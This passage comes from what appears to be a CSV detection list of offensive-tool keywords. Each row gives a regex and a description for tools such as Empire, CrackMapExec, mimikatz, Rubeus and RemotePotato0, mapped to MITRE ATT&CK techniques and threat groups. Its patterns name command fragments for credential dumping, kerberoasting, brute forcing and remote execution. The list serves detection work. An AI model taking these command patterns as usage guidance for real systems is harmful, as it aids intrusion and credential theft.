Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* -Rhost * -WARFile http*",".{0,1000}\s\-Rhost\s.{0,1000}\s\-WARFile\shttp.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-JBoss.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -Rhosts * -Password * -Directory * -Dictionary *",".{0,1000}\s\-Rhosts\s.{0,1000}\s\-Password\s.{0,1000}\s\-Directory\s.{0,1000}\s\-Dictionary\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","HTTP-Login.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -Rhosts * -Path *.txt -Port *",".{0,1000}\s\-Rhosts\s.{0,1000}\s\-Path\s.{0,1000}\.txt\s\-Port\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Find-Fruit.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* riak-http-info.nse*",".{0,1000}\sriak\-http\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rid_hijack.py*",".{0,1000}\srid_hijack\.py.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "* --rid-brute *",".{0,1000}\s\-\-rid\-brute\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* --rid-brute 2>&1 *.txt*",".{0,1000}\s\-\-rid\-brute\s2\>\&1\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* --rid-brute*",".{0,1000}\s\-\-rid\-brute.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* rid-hijack -*",".{0,1000}\srid\-hijack\s\-.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "* -rl 4 -ta 8 -t 2100 -an AS8560*",".{0,1000}\s\-rl\s4\s\-ta\s8\s\-t\s2100\s\-an\sAS8560.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* rlogin-brute.nse*",".{0,1000}\srlogin\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rm_injection.exe*",".{0,1000}\srm_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* rmi-dumpregistry.nse*",".{0,1000}\srmi\-dumpregistry\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rmi-vuln-classloader.nse*",".{0,1000}\srmi\-vuln\-classloader\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rockyou.txt *",".{0,1000}\srockyou\.txt\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* RogueOxidResolver must be run remotely*",".{0,1000}\sRogueOxidResolver\smust\sbe\srun\sremotely.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "* --rogue-smbserver-ip *",".{0,1000}\s\-\-rogue\-smbserver\-ip\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "* --rogue-smbserver-share *",".{0,1000}\s\-\-rogue\-smbserver\-share\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "* ropbuffers.go*",".{0,1000}\sropbuffers\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "* ropfuscator*",".{0,1000}\sropfuscator.{0,1000}","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","0","N/A","N/A","4","397","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" "* rpcap-brute.nse*",".{0,1000}\srpcap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rpcap-info.nse*",".{0,1000}\srpcap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rpcdump.py*",".{0,1000}\srpcdump\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "* rpc-grind.nse*",".{0,1000}\srpc\-grind\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rpcinfo.nse*",".{0,1000}\srpcinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rsa-vuln-roca.nse*",".{0,1000}\srsa\-vuln\-roca\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rsync-brute.nse*",".{0,1000}\srsync\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rsync-list-modules.nse*",".{0,1000}\srsync\-list\-modules\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rt_hijacking.exe*",".{0,1000}\srt_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* rtsp-methods.nse*",".{0,1000}\srtsp\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rtsp-url-brute.nse*",".{0,1000}\srtsp\-url\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -Rubeus -Command *kerberoast*",".{0,1000}\s\-Rubeus\s\-Command\s.{0,1000}kerberoast.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* ruler.exe*",".{0,1000}\sruler\.exe.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "* --rules:Jumbo *",".{0,1000}\s\-\-rules\:Jumbo\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* run donpapi*",".{0,1000}\srun\sdonpapi.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "* run netexec *",".{0,1000}\srun\snetexec\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* run nxc smb *",".{0,1000}\srun\snxc\ssmb\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* RunasCs.cs*",".{0,1000}\sRunasCs\.cs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "* -runaslsass*",".{0,1000}\s\-runaslsass.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","5","450","65","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" "* rusers.nse*",".{0,1000}\srusers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* rustbof *",".{0,1000}\srustbof\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","0","N/A","10","10","221","23","2024-02-08T20:45:00Z","2022-02-28T23:46:00Z" "* rusthound.exe*",".{0,1000}\srusthound\.exe.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "* rwf.py *",".{0,1000}\srwf\.py\s.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","0","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "* -s * -c command_exec --execute *",".{0,1000}\s\-s\s.{0,1000}\s\-c\scommand_exec\s\-\-execute\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -s * -c disable_wdigest *",".{0,1000}\s\-s\s.{0,1000}\s\-c\sdisable_wdigest\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -s * -c disable_winrm *",".{0,1000}\s\-s\s.{0,1000}\s\-c\sdisable_winrm\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -s * -c enable_wdigest *",".{0,1000}\s\-s\s.{0,1000}\s\-c\senable_wdigest\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -s * -c enable_winrm *",".{0,1000}\s\-s\s.{0,1000}\s\-c\senable_winrm\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -s * -c remote_posh *",".{0,1000}\s\-s\s.{0,1000}\s\-c\sremote_posh\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -s * --method 1 --function shell_exec --parameters cmd:id*",".{0,1000}\s\-s\s.{0,1000}\s\-\-method\s1\s\-\-function\sshell_exec\s\-\-parameters\scmd\:id.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -s *ascii* -b *reverse*invoke-expression*",".{0,1000}\s\-s\s.{0,1000}ascii.{0,1000}\s\-b\s.{0,1000}reverse.{0,1000}invoke\-expression.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "* -s 127.0.0.1 -e * -a connect -u ntlm*",".{0,1000}\s\-s\s127\.0\.0\.1\s\-e\s.{0,1000}\s\-a\sconnect\s\-u\sntlm.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "* -s putty.exe_sig *",".{0,1000}\s\-s\sputty\.exe_sig\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*' s::l '*",".{0,1000}\'\ss\:\:l\s\'.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation 